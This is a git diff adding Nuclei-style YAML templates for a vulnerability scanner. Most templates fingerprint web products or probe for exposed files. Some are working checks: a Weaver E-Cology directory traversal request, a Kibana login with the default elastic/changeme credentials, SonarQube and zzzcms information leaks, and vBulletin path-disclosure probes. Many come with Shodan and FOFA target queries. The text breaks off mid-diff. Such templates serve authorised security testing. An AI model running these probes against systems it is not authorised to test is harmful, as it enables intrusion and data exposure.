b/poc/detect/casaos-detection.yaml new file mode 100644 index 0000000000..a4cd8658c9 --- /dev/null +++ b/poc/detect/casaos-detection.yaml @@ -0,0 +1,31 @@ +id: casaos-detection + +info: + name: CasaOS Detection + author: pdteam + severity: info + reference: + - https://github.com/IceWhaleTech/CasaOS + metadata: + max-request: 1 + shodan-query: http.html:"/CasaOS-UI/public/index.html" + fofa-query: body="/CasaOS-UI/public/index.html" + tags: casaos,tech,oss + +http: + - method: GET + path: + - "{{BaseURL}}/v1/sys/debug" + + matchers: + - type: dsl + dsl: + - contains(to_lower(body), 'casaos version') + + extractors: + - type: regex + group: 1 + regex: + - CasaOS Version:\s*([0-9.]+) + +# digest: 490a004630440220477bd4b3de6e4497c9e589ce0fe9ee5b0053fd63a04b819d1bed73c6bfb3d93602205b0986e3fab04b5edd5c48b3179839a9aa8f3afa6e345ed2aade3838019a3a6e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/checkpoint-mobile-detect.yaml b/poc/detect/checkpoint-mobile-detect.yaml new file mode 100644 index 0000000000..2019f75869 --- /dev/null +++ b/poc/detect/checkpoint-mobile-detect.yaml @@ -0,0 +1,36 @@ +id: checkpoint-mobile-detect + +info: + name: Check Point Mobile SSL VPN - Detect + author: righettod + severity: info + description: | + Check Point Mobile SSL VPN was detected. + reference: + - https://www.checkpoint.com/quantum/remote-access-vpn/ + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"Check Point Mobile" + tags: panel,checkpoint,detect + +http: + - method: GET + path: + - '{{BaseURL}}/sslvpn/Login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Check Point Mobile' + - 'Check Point Software Technologies' + condition: and + case-insensitive: true + + - type: status + status: + - 403 + +# digest: 4b0a0048304602210096fd8cd25e09a5330a5a44abb2f26ade9700d4445d954f16aaaed67ac566c15f022100f5ad48424d901e210b809d9055b6d2400ce21081e07a55fc8a8fc3bb0a6a2b40:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/chromecast-detect.yaml b/poc/detect/chromecast-detect.yaml new file mode 100644 index 0000000000..af7b1bcb74 --- /dev/null +++ b/poc/detect/chromecast-detect.yaml @@ -0,0 +1,36 @@ +id: chromecast-detect + +info: + name: Google Chromecast - Detect + author: LucianNitescu + severity: info + description: | + Searches for Google Chromecast via their eureka_info route. + reference: + - https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43 + - https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication + metadata: + verified: true + max-request: 1 + shodan-query: Chromecast + tags: google,chromecast,detect + +http: + - raw: + - | + GET /setup/eureka_info HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"cast_build_revision":' + - '"ssdp_udn":' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/cvsweb-detect.yaml b/poc/detect/cvsweb-detect.yaml new file mode 100644 index 0000000000..3a94bf7c33 --- /dev/null +++ b/poc/detect/cvsweb-detect.yaml @@ -0,0 +1,45 @@ +id: cvsweb-detect + +info: + name: CVSweb - Detect + author: lu4nx + severity: info + description: | + CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner. + reference: + - https://cvsweb.openbsd.org/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"cvsweb" + fofa-query: title="cvsweb" + zoomeye-query: title:cvsweb + tags: tech,cvsweb,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'content=".*CVSweb.*"' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'content=".*CVSweb\s*([0-9.]+)"' + +# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/directus-detect.yaml b/poc/detect/directus-detect.yaml new file mode 100644 index 0000000000..b130dc3a9e --- /dev/null +++ b/poc/detect/directus-detect.yaml @@ -0,0 +1,28 @@ +id: directus-detect + +info: + name: Directus - Detect + author: ricardomaia + severity: info + description: | + Directus is a content manager with dynamic access API generation and transparent integration with the main databases. + reference: + - https://directus.io/ + metadata: + verified: true + max-request: 1 + google-query: 'X-Powered-By: Directus' + tags: tech,directus,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "X-Powered-By: Directus" + case-insensitive: true +# digest: 490a004630440220479c02cfe34e7b2c20a1a976a14a53f0b1aafded106d55d08b9805cd3715425c02202a6fb91a2289a5fae5ff1ce56b8fef09bfcec164a5546e1ad4a8145584d5212b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/element-web-detect.yaml b/poc/detect/element-web-detect.yaml new file mode 100644 index 0000000000..ad7b412929 --- /dev/null +++ b/poc/detect/element-web-detect.yaml @@ -0,0 +1,36 @@ +id: element-web-detect + +info: + name: Element Web - Detect + author: davidegirardi + severity: info + description: Identify if a web application is vanilla Element Web and return the version + metadata: + verified: true + max-request: 2 + shodan-query: html:"manifest.json" + tags: tech,matrix,element,detect + +http: + - method: GET + path: + - "{{BaseURL}}/manifest.json" + - "{{BaseURL}}/version" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(content_type_1, "application/json")' + - 'contains(json_minify(body_1), "\"name\":\"Element\"")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + part: body + regex: + - '[^\s]+' +# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/identity-server-v3-detect.yaml b/poc/detect/identity-server-v3-detect.yaml new file mode 100644 index 0000000000..1d54d2dc5f --- /dev/null +++ b/poc/detect/identity-server-v3-detect.yaml @@ -0,0 +1,38 @@ +id: identity-server-v3-detect + +info: + name: Identity Server V3 - Detect + author: righettod + severity: info + description: | + Identity Server V3 technology was detected. + reference: + - https://identityserver.github.io/Documentation/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"IdentityServer v3" + tags: tech,identityserver,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "IdentityServer v3") && contains(body, "identityserver.github.io")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)build\s+([a-z0-9.-]+)' +# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/limesurvey-detect.yaml b/poc/detect/limesurvey-detect.yaml new file mode 100644 index 0000000000..3707ea8649 --- /dev/null +++ b/poc/detect/limesurvey-detect.yaml @@ -0,0 +1,40 @@ +id: limesurvey-detect + +info: + name: LimeSurvey Survey Software - Detect + author: Matt Galligan + severity: info + description: | + Limesurvey is the number one open-source survey software. Advanced features like branching and multiple question types make it a valuable partner for survey-creation. + reference: + - https://github.com/LimeSurvey/LimeSurvey + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:1781653957 + tags: tech,limesurvey + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'content="LimeSurvey' + - 'alt="LimeSurvey Survey Software' + - 'data-limesurvey-lang=' + - 'alt="Powered by LimeSurvey' + condition: or + case-insensitive: true + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100c785935a42c9693f0bfd8dc790217cb13b8524ec59a862d42b0980b290c4b58602203a031943f0c70c1cae370d25197e1454f98980705027ddabca0e72bad0c11ac8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/matrix-homeserver-detect.yaml b/poc/detect/matrix-homeserver-detect.yaml new file mode 100644 index 0000000000..de3ffd0bb8 --- /dev/null +++ b/poc/detect/matrix-homeserver-detect.yaml @@ -0,0 +1,37 @@ +id: matrix-homeserver-detect + +info: + name: Matrix Homeserver - Version Detection + author: davidegirardi + severity: info + description: | + Extract the Matrix homeserver name and version + metadata: + verified: true + max-request: 1 + shodan-query: title:"Synapse is running" + tags: tech,matrix,synapse + +http: + - method: GET + path: + - "{{BaseURL}}/_matrix/federation/v1/version" + + redirects: true + max-redirects: 2 + + matchers: + - type: word + part: body + words: + - '"server":' + - '"name":' + - '"version":' + condition: and + + extractors: + - type: json + part: body + json: + - '.server | select((.name != null) and (.version != null)) | .name, .version' +# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/openproject-detect.yaml b/poc/detect/openproject-detect.yaml new file mode 100644 index 0000000000..e96f5f5652 --- /dev/null +++ b/poc/detect/openproject-detect.yaml @@ -0,0 +1,44 @@ +id: openproject-detect + +info: + name: OpenProject - Detect + author: ricardomaia + severity: info + description: OpenProject is an open source web-based project management software. + reference: + - https://www.openproject.org/ + metadata: + verified: "true" + max-request: 3 + shodan-query: title:"openproject" + tags: tech,openproject,api,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/api/v3" + - "{{BaseURL}}/activity.atom" + + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: regex + regex: + - '.*OpenProject.Foundation.\(OPF\)' + - "" + condition: or + + - type: word + words: + - "OpenProject" + - "instanceName" + condition: and + + - type: word + part: header + words: + - "_open_project_session" + +# digest: 4a0a00473045022059c6265ce96feb60a74cefb35bfa8c4a81fdc509fff6aa1ebdac6b44f45aba22022100c16151d234f3d62b7a405702b9fc86de6824c00f7dd6bc08f30fafea7dfc1b5b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/phplist-detect.yaml b/poc/detect/phplist-detect.yaml new file mode 100644 index 0000000000..abeee78371 --- /dev/null +++ b/poc/detect/phplist-detect.yaml @@ -0,0 +1,42 @@ +id: phplist-detect + +info: + name: phpList - Detect + author: ricardomaia + severity: info + description: | + phpList is an open source newsletter manager. + reference: + - https://www.phplist.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"phplist" + tags: tech,phplist,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'content="phpList' + - 'phpList Ltd' + - 'phpList' + condition: or + case-insensitive: true + + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)version.((\d\.?)+)' + +# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/tibco-businessconnect-detect.yaml b/poc/detect/tibco-businessconnect-detect.yaml new file mode 100644 index 0000000000..671e1e2a71 --- /dev/null +++ b/poc/detect/tibco-businessconnect-detect.yaml @@ -0,0 +1,28 @@ +id: tibco-businessconnect-detect + +info: + name: TIBCO BusinessConnect - Detect + author: righettod + severity: info + description: | + TIBCO BusinessConnect technology was detected. + reference: + - https://www.tibco.com/products/tibco-businessconnect + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"TIBCO BusinessConnect" + tags: tibco,detect,tech + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "TIBCO BusinessConnect")' + condition: and +# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/wing-ftp-service-detect.yaml b/poc/detect/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..551f2631dd --- /dev/null +++ b/poc/detect/wing-ftp-service-detect.yaml @@ -0,0 +1,25 @@ +id: wing-ftp-service-detect + +info: + name: Wing FTP Service - Detect + author: ritikchaddha + severity: info + description: | + The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + metadata: + verified: true + max-request: 1 + shodan-query: "Wing FTP Server" + tags: tech,ftp,wing,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Wing FTP Server" +# digest: 4b0a00483046022100c80a28fe09665c71ca345c950405518bec7b02defcbed410c0a59c743e24da46022100bc4ae224a03b1cecc0f9646db3ce15f82e26125b2eb0fd647cd0ba7395be4be9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/directory_listing/ecology-jqueryfiletree-traversal.yaml b/poc/directory_listing/ecology-jqueryfiletree-traversal.yaml new file mode 100755 index 0000000000..1645c03cdd --- /dev/null +++ b/poc/directory_listing/ecology-jqueryfiletree-traversal.yaml @@ -0,0 +1,36 @@ +id: ecology-jqueryfiletree-traversal + +info: + name: Weaver E-Cology JqueryFileTree - Directory Traversal + author: SleepingBag945 + severity: medium + description: | + Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24 + metadata: + verified: true + max-request: 1 + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" + tags: weaver,ecology,traversal,lfr + +http: + - method: GET + path: + - "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../" + + matchers-condition: and + matchers: + - type: word + words: + - "'index.jsp','" + - "重命名" + - "新建目录" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a004730450220084693227949fe0d92a25b723d712313045095556beeab08ed5c2755c7cc4623022100c12802c1e612411f9558a892fa802d0c08c58b07dcce2104f91503f82c08f847:922c64590222798bb761d5b6d8e72950 diff --git a/poc/elk/elasticsearch-default-login.yaml b/poc/elk/elasticsearch-default-login.yaml new file mode 100644 index 0000000000..330f016c3d --- /dev/null +++ b/poc/elk/elasticsearch-default-login.yaml @@ -0,0 +1,53 @@ +id: elasticsearch-default-login + +info: + name: ElasticSearch - Default Login + author: Mohammad Reza Omrani | @omranisecurity + severity: high + description: | + Elasticsearch default credentials were discovered. + reference: + - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610 + - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 + tags: default-login,elasticsearch + +http: + - raw: + - | + POST /internal/security/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5 + Referer: {{RootURL}}/login + Content-Type: application/json + kbn-version: 8.8.2 + x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D + Origin: {{RootURL}} + + {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }} + + payloads: + username: + - elastic + password: + - changeme + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: sid=' + - 'kbn-license-sig:' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/exposed/graylog-api-exposure.yaml b/poc/exposed/graylog-api-exposure.yaml new file mode 100644 index 0000000000..62d08209c3 --- /dev/null +++ b/poc/exposed/graylog-api-exposure.yaml @@ -0,0 +1,91 @@ +id: graylog-api-exposure + +info: + name: Graylog REST API Endpoints - Exposure + author: Arqsz + severity: info + description: | + Graylog is a centralized log management solution. According to the official documentation, it exposes multiple endpoints (some by default). + reference: + - https://go2docs.graylog.org/5-0/setting_up_graylog/rest_api.html + - https://gist.github.com/asachs01/f1f317b2924a688deb8ed2520a4520bd + metadata: + verified: true + max-request: 50 + shodan-query: Graylog + tags: tech,graylog,api,swagger,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/api-browser" + - "{{BaseURL}}/api/cluster" + - "{{BaseURL}}/api/dashboards" + - "{{BaseURL}}/api/events/definitions" + - "{{BaseURL}}/api/events/definitions/validate" + - "{{BaseURL}}/api/events/notifications/test" + - "{{BaseURL}}/api/events/search" + - "{{BaseURL}}/api/free-enterprise/license" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/checkSubscriptions" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/startSubscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/cloudwatch/log_groups" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_stream" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription_policy" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/health_check" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/streams" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/backends" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/cluster/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.collector/configurations" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.license/licenses/verify" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.report/reports" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/team-sync/test/backend" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/teams" + - "{{BaseURL}}/api/scheduler/jobs" + - "{{BaseURL}}/api/system/authentication/services/backends" + - "{{BaseURL}}/api/system/authentication/services/test/backend/connection" + - "{{BaseURL}}/api/system/authentication/services/test/backend/login" + - "{{BaseURL}}/api/system" + - "{{BaseURL}}/api/system/content_packs" + - "{{BaseURL}}/api/system/indexer/cluster/health" + - "{{BaseURL}}/api/system/indexer/cluster/name" + - "{{BaseURL}}/api/system/debug/events/cluster" + - "{{BaseURL}}/api/system/debug/events/local" + - "{{BaseURL}}/api/system/jobs" + - "{{BaseURL}}/api/system/pipelines/pipeline" + - "{{BaseURL}}/api/system/pipelines/rule" + - "{{BaseURL}}/api/system/urlwhitelist/check" + - "{{BaseURL}}/api/system/urlwhitelist/generate_regex" + - "{{BaseURL}}/api/views" + - "{{BaseURL}}/api/views/fields" + - "{{BaseURL}}/api/views/forValue" + - "{{BaseURL}}/api/views/search/messages" + - "{{BaseURL}}/api/views/search/metadata" + - "{{BaseURL}}/api/views/search/sync" + - "{{BaseURL}}/api/users" + + host-redirects: true + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains_any(header, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'swagger')" + condition: and + + - type: dsl + name: unauthorized-graylog-header + dsl: + - "status_code == 401" + - "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')" + condition: and +# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/rakefile-disclosure.yaml b/poc/exposed/rakefile-disclosure.yaml new file mode 100644 index 0000000000..466670d5bb --- /dev/null +++ b/poc/exposed/rakefile-disclosure.yaml @@ -0,0 +1,40 @@ +id: rakefile-disclosure + +info: + name: Rakefile - File Disclosure + author: DhiyaneshDK + severity: info + description: | + Rakefile configuration file was detected. + reference: + - https://ruby.github.io/rake/doc/rakefile_rdoc.html + metadata: + verified: true + max-request: 1 + shodan-query: html:"Rakefile" + tags: devops,exposure,rakefile,config,ruby,rails + +http: + - method: GET + path: + - "{{BaseURL}}/Rakefile" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'application.load_tasks' + - 'config/application' + condition: and + case-insensitive: true + + - type: word + part: body + words: + - 'require' + - 'desc' + - 'task :' + condition: and + +# digest: 490a00463044022006d1348a9ef873df72d1fb2c0826d6d4ab59cae528ffd3b606b12acb7cd446d402206735a2059c2232203e2902431481d570b764b24f0dac6abcabd0507111b0c262:922c64590222798bb761d5b6d8e72950 diff --git a/poc/exposed/request-baskets-exposure.yaml b/poc/exposed/request-baskets-exposure.yaml index 995cfe7e86..61df9e73d1 100644 --- a/poc/exposed/request-baskets-exposure.yaml +++ b/poc/exposed/request-baskets-exposure.yaml @@ -4,6 +4,7 @@ info: name: Request Baskets - Exposure author: DhiyaneshDk severity: low + description: Request Baskets is exposed. reference: - https://notes.sjtu.edu.cn/s/MUUhEymt7# - https://github.com/entr0pie/CVE-2023-27163 @@ -33,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100efc1e11d921661ef61f541cf6c8847d9962aab9193aabd2ea7ac44f2af94138c02205d1f9273137feac456b67992318ac1c71e5f832ae41fabc08e475198d70b0d4b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/sonarqube-projects-disclosure.yaml b/poc/exposed/sonarqube-projects-disclosure.yaml new file mode 100644 index 0000000000..4c11c81f3e --- /dev/null +++ b/poc/exposed/sonarqube-projects-disclosure.yaml @@ -0,0 +1,42 @@ +id: sonarqube-projects-disclosure + +info: + name: SonarQube - Information Disclosure + author: DhiyaneshDk + severity: medium + description: | + Information leakage vulnerability in an interface of SonarQube, you can download the source code through the tool. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/SonarQube/SonarQube%20search_projects%20%E9%A1%B9%E7%9B%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + - https://github.com/deletescape/sloot + metadata: + verified: true + max-request: 1 + shodan-query: title:"Sonarqube" + fofa-query: app="sonarQube-代码管理" + tags: sonarqube,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/api/components/search_projects" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"visibility":"public"' + - '{"organization' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022007a5c2766f7648947c60b9d94121e7d4c522fce141ab6513f1e74b4439e5c869022100e6096339fde4571b6d11b0a6aff6f84e658bead95452dcb7bf8e253ecd6f9c3f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/exposed/vbulletin-path-disclosure.yaml b/poc/exposed/vbulletin-path-disclosure.yaml new file mode 100644 index 0000000000..621dc74d5d --- /dev/null +++ b/poc/exposed/vbulletin-path-disclosure.yaml @@ -0,0 +1,58 @@ +id: vbulletin-path-disclosure + +info: + name: vBulletin - Full Path Disclosure + author: MaStErChO + severity: info + reference: + - https://github.com/OWASP/vbscan/blob/master/modules/pathdisclure.pl + metadata: + verified: true + max-request: 11 + shodan-query: "title:\"vBulletin\"" + tags: config,exposure,fpd,vbulletin +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "vBulletin" + + - method: GET + path: + - "{{BaseURL}}/forumdisplay.php?do[]=[test.dll]" + - "{{BaseURL}}/calendar.php?do[]=[test.dll]" + - "{{BaseURL}}/search.php?do[]=[test.dll]" + - "{{BaseURL}}/forumrunner/include/album.php" + - "{{BaseURL}}/core/vb5/route/channel.php" + - "{{BaseURL}}/core/vb5/route/conversation.php" + - "{{BaseURL}}/includes/api/interface/noncollapsed.php" + - "{{BaseURL}}/includes/api/interface/collapsed.php" + - "{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba.php" + - "{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba_links.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Warning:" + - "Cannot modify header information" + - "/strong> on line" + - "trim() expects parameter" + - "class_core.php" + - "header already sent" + - "Fatal error" + condition: or + + - type: status + status: + - 200 +# digest: 4a0a0047304502207d3e73d53cf79e65756b7ea8f63d32afb7c504cb49a5ce7c3eac1011cf700524022100eb99c5aa18691eacf4a8b477f61ddf4409d217306fff52ac289f07a5c96044c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/viminfo-disclosure.yaml b/poc/exposed/viminfo-disclosure.yaml new file mode 100644 index 0000000000..946f2225ca --- /dev/null +++ b/poc/exposed/viminfo-disclosure.yaml @@ -0,0 +1,40 @@ +id: viminfo-disclosure + +info: + name: Viminfo - File Disclosure + author: DhiyaneshDK + severity: low + description: | + Viminfo file was detected. + reference: + - https://renenyffenegger.ch/notes/development/vim/editing/viminfo/index + metadata: + verified: true + max-request: 1 + shodan-query: html:"Viminfo" + tags: devops,exposure,viminfo,config + +http: + - method: GET + path: + - "{{BaseURL}}/.viminfo" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Viminfo version' + - 'Command Line History' + condition: and + + - type: word + part: header + words: + - 'application/octet-stream' + + - type: status + status: + - 200 + +# digest: 490a004630440220778d9bfb13df46593453e6e11bbae8931112f2d6b97b5e4a5825d0eeae42af8202202f27116c557a1ee76a284cc98400bdb792a88f95295f2b710cc4fb110a936278:922c64590222798bb761d5b6d8e72950 diff --git a/poc/exposed/zzzcms-info-disclosure.yaml b/poc/exposed/zzzcms-info-disclosure.yaml new file mode 100644 index 0000000000..a79ec2a893 --- /dev/null +++ b/poc/exposed/zzzcms-info-disclosure.yaml @@ -0,0 +1,42 @@ +id: zzzcms-info-disclosure + +info: + name: Zzzcms 1.75 - Information Disclosure + author: ritikchaddha + severity: low + description: | + There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore + reference: + - https://xz.aliyun.com/t/7414 + metadata: + verified: true + max-request: 1 + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,info,disclosure + +http: + - raw: + - | + GET /plugins/webuploader/js/webconfig.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var adminpath' + - 'var imageMaxSize=' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# digest: 4a0a0047304502202a3a4916c5fadccff982078fec5a98de45b89076f013e080cad56b7f25fd7327022100bc6f7789895c6bb952913f2990bb4214961e49148417b7b16e969c14585ea09d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/ftp/wing-ftp-service-detect.yaml b/poc/ftp/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..551f2631dd --- /dev/null +++ b/poc/ftp/wing-ftp-service-detect.yaml @@ -0,0 +1,25 @@ +id: wing-ftp-service-detect + +info: + name: Wing FTP Service - Detect + author: ritikchaddha + severity: info + description: | + The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + metadata: + verified: true + max-request: 1 + shodan-query: "Wing FTP Server" + tags: tech,ftp,wing,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Wing FTP Server" +# digest: 4b0a00483046022100c80a28fe09665c71ca345c950405518bec7b02defcbed410c0a59c743e24da46022100bc4ae224a03b1cecc0f9646db3ce15f82e26125b2eb0fd647cd0ba7395be4be9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/google/google-secrets.yaml b/poc/google/google-secrets.yaml index a689838b9d..d9cb5cef3a 100644 --- a/poc/google/google-secrets.yaml +++ b/poc/google/google-secrets.yaml @@ -15,21 +15,21 @@ file: extractors: - type: regex - name: google-api-key + name: facebook-access-token regex: - - 